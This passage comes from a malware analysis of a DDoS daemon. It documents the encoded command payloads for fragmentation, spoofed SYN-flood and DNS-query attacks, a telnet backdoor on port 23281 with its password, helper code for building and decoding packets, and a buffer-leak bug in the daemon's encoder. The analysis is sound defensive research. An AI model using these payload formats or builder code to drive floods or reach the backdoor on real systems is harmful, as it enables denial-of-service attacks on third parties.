45b2 001d 0455 1ffe c401 c1c7 0506 0708
0102 0304 0800 9567 c9ca cbcc cd
18:22:55.613553 > 5.6.7.8 > 1.2.3.4: (frag 1109:9@65520) [tos 0xb2,ECT]
45b2 001d 0455 1ffe c401 c1c7 0506 0708
0102 0304 0800 9567 c9ca cbcc cd
18:22:55.623553 > 5.6.7.8 > 1.2.3.4: (frag 1109:9@65520) [tos 0xb2,ECT]
45b2 001d 0455 1ffe c401 c1c7 0506 0708
0102 0304 0800 9567 c9ca cbcc cd
18:22:55.623553 > 5.6.7.8 > 1.2.3.4: (frag 1109:9@65520) [tos 0xb2,ECT]
45b2 001d 0455 1ffe c401 c1c7 0506 0708
0102 0304 0800 9567 c9ca cbcc cd
18:22:55.633553 > 5.6.7.8 > 1.2.3.4: (frag 1109:9@65520) [tos 0xb2,ECT]
45b2 001d 0455 1ffe c401 c1c7 0506 0708
0102 0304 0800 9567 c9ca cbcc cd
It sends out fragmented packets with 9 byte payload, but with an offset
of 65520, constituting a fragmented IP packets attack.
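The offset reported by tcpdump can be checked directly against the IP header bytes. The following Python sketch (function name and dictionary keys are ours) extracts the fragment fields from the 20-byte header of one of the packets above.

```python
import struct


def fragment_info(ip_header: bytes) -> dict:
    """Extract the fragmentation-related fields from an IPv4 header."""
    ver_ihl, _tos, total_len, ident, flags_frag, _ttl, proto = struct.unpack(
        "!BBHHHBB", ip_header[:10]
    )
    header_len = (ver_ihl & 0x0F) * 4
    offset = (flags_frag & 0x1FFF) * 8        # field counts 8-byte units
    data_len = total_len - header_len
    return {
        "ident": ident,
        "protocol": proto,
        "more_fragments": bool(flags_frag & 0x2000),
        "offset": offset,
        "data_len": data_len,
        "reassembled_len": header_len + offset + data_len,
    }


if __name__ == "__main__":
    header = bytes.fromhex("45b2001d04551ffec401c1c70506070801020304")
    print(fragment_info(header))
```

For this packet the header, offset and data add up to more than 65535 bytes, the largest value the 16-bit IP total length field can hold, which is presumably what makes the fragment harmful to a vulnerable receiver.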
6.2.6 Function 5
The following is the payload for Function 5 :
0000000 00 06
The binary will spawn a child to listen on TCP port 23281. When a remote
telnet client connects to this port and types "SeNiF", a remote shell will be
created. Note that if you add 1 to each byte in this password, you will get
the string "TfOjG", which is the string that appeared in the strings output
in Section 3.
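The relationship between the two strings is easy to verify with a couple of lines of Python. The helper name shift_bytes is ours; the sketch only demonstrates the arithmetic, not the comparison code in the binary.

```python
def shift_bytes(text: str, delta: int) -> str:
    """Add delta to every character code, wrapping at 256."""
    return "".join(chr((ord(c) + delta) & 0xFF) for c in text)


if __name__ == "__main__":
    print(shift_bytes("SeNiF", 1))   # password -> string stored in the binary
    print(shift_bytes("TfOjG", -1))  # stored string -> password
```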
6.2.7 Function 6
The payload for Function 6 is identical to Function 2. The only difference
is that the binary does not send any reply in this case.
6.2.8 Function 7
The payload for Function 7 is as follows :
0000000 00 08
Upon receiving this packet, the binary will kill the active attacking
child or remote shell. The binary maintains a global
variable that indicates which function is currently active. At any one time,
only 1 attack function or remote shell function can be active.
6.2.9 Function 8
The payload for Function 8 is similar to Function 3, except that it
has 1 more field which controls the number of attacking packets sent out.
0000000 00 09 01 02 03 04 08 00 7b 00 61 62 63 00
The 2nd byte indicates that it is Function 8. The next 4 bytes specify the
victim IP address. The next byte (08) is the field
that specifies the number of packets. The next 2 bytes specify the victim
port. The next byte indicates whether to use the IP 01 02 03 04 or
the hostname 61 62 63 00 ("abc") as the victim. The binary's response in
this case is similar to that for Function 3.
6.2.10 Function 9
This function starts a TCP SYN attack. The decoded payload is as follows:
0000000 00 0a 01 02 03 04 00 7b 00 05 06 07 08 00 61 62
0000020 63 00
The 4 bytes after the function code are the victim's IP. The next 2 bytes
are the victim's port. The next byte (00 in this example) indicates whether
to generate a random source IP or to use the one supplied in the payload.
The next 4 bytes contain a probably faked source IP. The next byte indicates
whether to use the IP 01 02 03 04 or the hostname 61 62 63 00 ("abc") as
the victim.
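Going the other way, the same decoded payload can be assembled from its fields. The Python sketch below is illustrative: build_function9 and its parameter names are hypothetical, and the result still has to pass through the binary's network encoder (not reproduced here) before it would be accepted.

```python
import socket
import struct

def build_function9(victim_ip: str, victim_port: int, src_flag: int,
                    source_ip: str, victim_flag: int, hostname: str) -> bytes:
    """Assemble a decoded Function 9 payload in the field order described above."""
    return (
        struct.pack("!BB", 0x00, 0x0A)              # leading byte, function code
        + socket.inet_aton(victim_ip)               # 4 bytes: victim IP
        + struct.pack("!HB", victim_port, src_flag) # port, random-source flag
        + socket.inet_aton(source_ip)               # 4 bytes: supplied source IP
        + struct.pack("!B", victim_flag)            # IP-or-hostname flag
        + hostname.encode("ascii") + b"\x00"        # NUL-terminated hostname
    )

payload = build_function9("1.2.3.4", 123, 0, "5.6.7.8", 0, "abc")
print(payload.hex(" "))
```

With the example values, the output matches the 18 bytes of the hexdump above.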
The response of the binary is as follows, illustrating a SYN attack. To
learn more about the TCP SYN attack, please refer to CERT Advisory CA-1996-21
[9].
18:25:28.885667 > 94.207.87.95.29342 > 1.2.3.4.ntp: S 35354633:35354633(0) win 1033
4500 0028 0385 0000 dc06 2117 5ecf 575f
0102 0304 729e 007b 021b 7809 0000 0000
5002 0409 0468 0000
18:25:28.895667 > 235.94.192.111.31802 > 1.2.3.4.ntp: S 30203676:30203676(0) win 1418
4500 0028 032d 0000 da06 2dcf eb5e c06f
0102 0304 7c3a 007b 01cc df1c 0000 0000
5002 058a 9ce6 0000
18:25:28.905667 > 212.209.113.103.10768 > 1.2.3.4.ntp: S 12671260:12671260(0) win 849
4500 0028 07b7 0000 b906 afda d4d1 7167
0102 0304 2a10 007b 00c1 591c 0000 0000
5002 0351 ddea 0000
18:25:28.915667 > 125.153.130.194.9037 > 1.2.3.4.ntp: S 17593335:17593335(0) win 449
4500 0028 0dcf 0000 8606 22a0 7d99 82c2
0102 0304 234d 007b 010c 73f7 0000 0000
5002 01c1 10f5 0000
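The hex dump of the first packet in this trace can be decoded to confirm what tcpdump reports. The following Python sketch is our own illustration and uses only the bytes shown above. It extracts the source address, the ports, the sequence number and the TCP flags.

```python
import socket
import struct

# First packet of the trace above: 20-byte IP header + 20-byte TCP header.
packet = bytes.fromhex(
    "4500 0028 0385 0000 dc06 2117 5ecf 575f"
    "0102 0304 729e 007b 021b 7809 0000 0000"
    "5002 0409 0468 0000"
)

ihl = (packet[0] & 0x0F) * 4                    # IP header length in bytes
src_ip = socket.inet_ntoa(packet[12:16])
dst_ip = socket.inet_ntoa(packet[16:20])

sport, dport, seq, ack, off_flags, window = struct.unpack(
    "!HHIIHH", packet[ihl:ihl + 16]
)
tcp_flags = off_flags & 0x3F                    # URG/ACK/PSH/RST/SYN/FIN bits
syn_only = tcp_flags == 0x02                    # only SYN is set

print(src_ip, sport, dst_ip, dport, seq, window, syn_only)
```

Each packet carries only the SYN flag and a different source address, which is consistent with the random-source option of the payload.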
6.2.11 Function 10
The payload for Function 10 is similar to that of Function 9, except that it
has 1 more field that controls the number of attacking
packets sent out.
0000000 00 0b 01 02 03 04 00 7b 01 05 06 07 08 09 00 61
0000020 62 63 00
The response for Function 10 is similar to Function 9.
6.2.12 Function 11
The payload for Function 11 is as follows:
0000000 00 0c 01 02 03 04 05 06 07 08 06 00 7b 00 61 62
0000020 63 00
01 02 03 04 is the victim's IP. The next 4 bytes contain a probably
faked source IP. The next byte (06 in this example) indicates the number
of packets to generate. The next 2 bytes are the victim's port. The next
byte indicates whether to use the IP 01 02 03 04 or the hostname 61 62
63 00 ("abc") as the victim.
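The response for Function 11 is as follows. It indicates an attack on
a single DNS server. Note that in this trace the queries are addressed to
port 53 (domain), while port 123 (ntp) from the payload appears as the
source port.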
18:25:59.030630 > 5.6.7.8.ntp > 1.2.3.4.domain: 62485+ SOA? com. (21)
4500 0031 6700 0000 cc11 77a8 0506 0708
0102 0304 007b 0035 001d 0000 f415 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:25:59.030630 > 5.6.7.8.ntp > 1.2.3.4.domain: 41640+ SOA? net. (21)
4500 0031 9f00 0000 f311 18a8 0506 0708
0102 0304 007b 0035 001d 0000 a2a8 0100
0001 0000 0000 0000 036e 6574 0000 0600
01
18:25:59.030630 > 5.6.7.8.ntp > 1.2.3.4.domain: 49902+ (20)
4500 0030 2900 0000 c411 bda9 0506 0708
0102 0304 007b 0035 001c 0000 c2ee 0100
0001 0000 0000 0000 0364 6500 0006 0001
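The DNS portion of the first query in the trace above (the 21 bytes following the IP and UDP headers) can be decoded as follows. This Python sketch is illustrative only: parse_query is a hypothetical helper that handles a single uncompressed question, which is all that this packet contains.

```python
import struct

# DNS message from the first packet above (after 20 bytes IP + 8 bytes UDP).
dns = bytes.fromhex("f415 0100 0001 0000 0000 0000 0363 6f6d 0000 0600 01")

def parse_query(msg: bytes) -> dict:
    """Decode the header and the first question of a DNS query."""
    ident, flags, qdcount, ancount, nscount, arcount = struct.unpack("!6H", msg[:12])
    labels, pos = [], 12
    while msg[pos] != 0:                        # length-prefixed labels
        length = msg[pos]
        labels.append(msg[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    qtype, qclass = struct.unpack("!HH", msg[pos + 1:pos + 5])
    return {
        "id": ident,
        "recursion_desired": bool(flags & 0x0100),  # shown as "+" by tcpdump
        "questions": qdcount,
        "name": ".".join(labels) + ".",
        "qtype": qtype,                             # 6 = SOA
        "qclass": qclass,                           # 1 = IN
    }

query = parse_query(dns)
print(query)
```

The decoded values agree with the tcpdump summary line "62485+ SOA? com. (21)".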
7. A bug
While exploring Function 2, we stumbled upon the following interesting
occurrence. The picture below shows a captured response packet from the
binary after executing Function 2. Normally, all the data should be encoded,
so no plain text should be seen. However, the picture clearly shows that
some plain text has appeared in the "encoded" packet.
After much study of the source code, we finally figured out the reason
for the above anomaly. It has to do with the way the binary uses its buffers
in the encoding process.
There are 3 buffers declared in the binary, contiguous in memory, related
to this function:
char bufEncode[400];
char bufClear[512];
char bufTemp[2048];
When a shell command is executed, the output is first
piped to a file in the /tmp directory. The contents of this file are then
read and stored in bufTemp, in blocks of 0x18E = 398 bytes. Each 398-byte
block is then transferred into the payload buffer, bufClear, prepended
with 2 bytes of control data to form a 400-byte payload. The payload is
then encoded and stored in bufEncode, which is 400 bytes in size. The contents
of bufEncode are then transmitted back to the master.
So far so good. However, the binary tries to be cute. Instead of transmitting
a fixed-size payload of 400 bytes every time, it tries to make the payload
size random by adding a random number between 0 and 200 to the size of
bufEncode. As a result, the total number of bytes transmitted each time can
vary between 400 and 600 bytes. Extending the transmitted size beyond 400
bytes causes additional data from bufClear, which is in clear text,
to be appended to the payload and transmitted, as shown in the picture above.
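The effect of the over-long send can be modelled in a few lines. The Python sketch below is a simulation under stated assumptions, not the binary's code: a single bytearray stands in for bufEncode followed directly by bufClear, stand_in_encode is a hypothetical placeholder for the real encoder, and the two control bytes are arbitrary values chosen for illustration.

```python
import random

ENCODE_SIZE = 400   # sizeof(bufEncode)
CLEAR_SIZE = 512    # sizeof(bufClear)

def stand_in_encode(data: bytes) -> bytes:
    # Hypothetical placeholder; the binary's real encoder is not reproduced here.
    return bytes(b ^ 0xFF for b in data)

def build_transmission(chunk: bytes, rng: random.Random) -> bytes:
    """Return the bytes that would be sent for one block of command output."""
    # One flat region models bufEncode immediately followed by bufClear.
    memory = bytearray(ENCODE_SIZE + CLEAR_SIZE)
    clear = (b"\x00\x03" + chunk)[:ENCODE_SIZE]         # 2 control bytes + data
    memory[ENCODE_SIZE:ENCODE_SIZE + len(clear)] = clear  # bufClear
    memory[0:len(clear)] = stand_in_encode(clear)         # bufEncode
    send_len = ENCODE_SIZE + rng.randint(0, 200)          # randomised length
    return bytes(memory[:send_len])                       # reads past bufEncode

rng = random.Random(1)
chunk = (b"sample shell output line\n" * 20)[:398]
sent = build_transmission(chunk, rng)
leaked = sent[ENCODE_SIZE:]     # clear-text bytes that follow the encoded part
print(len(sent), leaked[:32])
```

Whenever the random increment is non-zero, the tail of the transmission is a verbatim copy of the start of bufClear, that is, the control bytes followed by unencoded command output.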
8. Conclusion and comments
The binary in question is a DDoS daemon that shares many similarities with
other DDoS tools like TFN [4], especially in terms of control architecture
and features. It is controlled by a master that communicates with it via
IP protocol 11 packets. It is capable of carrying out a variety of DDoS attacks,
and has ample housekeeping functions.
The only interesting feature is the network encoder, but it turns out to
be a simple procedure that can be easily reverse engineered. That is why
we were able to craft encoded packets that we used to trigger the binary
and observe its network behaviour extensively.
One particularly puzzling "feature" is the choice of IP protocol 11 (0xb),
which is a very uncommon IP protocol. We seriously suspect that the usefulness
of the DDoS system will be severely limited, because whatever packets are
sent by either the master or the slave, firewalls will block them, routers
will drop them, and IDSes will pick them out as if under a spotlight.
Because of this, we are inclined to think that this is "lab" code, used
for experimentation in a lab. The choice of protocol seems better suited
to containment than to general use.
9. References
[1] IDA Pro Disassembler, http://www.datarescue.com/idabase
[2] Windows Emulator for Unix, http://www.winehq.com
[3] LibNet, http://libnet.sourceforge.net
[4] "The 'Tribe Flood Network' distributed denial of service attack tool",
http://staff.washington.edu/dittrich/misc/tfn.analysis, Dave Dittrich,
Oct 1999.
[5] Unix Programming FAQ, http://www.erlenstar.demon.co.uk/unix/faq_toc.html
[6] Internet Protocol Numbers, http://www.iana.org/assignments/protocol-numbers
[7] RFC741 - Specifications For The Network Voice Protocol, http://www.faqs.org/rfcs/rfc741.html
[8] CERT Incident Note IN-2000-04, "Denial of Service Attacks using Nameservers",
http://www.cert.org/incident_notes/IN-2000-04.html
[9] CERT Advisory CA-1996-21, "TCP SYN Flooding and IP Spoofing Attacks",
http://www.cert.org/advisories/CA-1996-21.html